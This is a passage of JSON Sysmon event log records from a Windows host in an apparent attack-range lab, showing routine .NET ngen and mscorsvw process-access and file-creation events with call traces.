C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:49.882","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-225D-5F25-0000-001093140E00}","TargetProcessId":"4652","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:49","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7613,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:49.882\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-225D-5F25-0000-001093140E00}\r\nTargetProcessId: 4652\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:49.882","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-225D-5F25-0000-001093140E00}","TargetProcessId":"4652","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:49","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7614,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:49.882\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-225D-5F25-0000-001093140E00}\r\nTargetProcessId: 4652\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:49.882","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-225D-5F25-0000-001093140E00}","TargetProcessId":"4652","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:49","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7615,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:49.976\r\nProcessGuid: {41C8662E-225D-5F25-0000-001093140E00}\r\nProcessId: 4652\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\122c-0\\SMDiagnostics.dll\r\nCreationUtcTime: 2020-08-01 08:05:49.976","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:49.976","ProcessGuid":"{41C8662E-225D-5F25-0000-001093140E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\122c-0\\SMDiagnostics.dll","CreationUtcTime":"2020-08-01 08:05:49.976","EventReceivedTime":"2020-08-01 08:05:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:50","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7616,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:50.007\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-224E-5F25-0000-00101DEC0C00}\r\nTargetProcessId: 1052\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:50.007","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-224E-5F25-0000-00101DEC0C00}","TargetProcessId":"1052","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:50","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7617,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:50.007\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-224E-5F25-0000-00101DEC0C00}\r\nTargetProcessId: 1052\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:50.007","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-224E-5F25-0000-00101DEC0C00}","TargetProcessId":"1052","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:50","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7618,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:50.022\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-225E-5F25-0000-0010811A0E00}\r\nTargetProcessId: 1052\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:50.022","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-225E-5F25-0000-0010811A0E00}","TargetProcessId":"1052","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:50","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7619,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:50.101\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-225E-5F25-0000-0010511E0E00}\r\nTargetProcessId: 4372\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:50.101","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-225E-5F25-0000-0010511E0E00}","TargetProcessId":"4372","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:50","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7620,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:50.101\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-225E-5F25-0000-0010511E0E00}\r\nTargetProcessId: 4372\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:50.101","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-225E-5F25-0000-0010511E0E00}","TargetProcessId":"4372","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
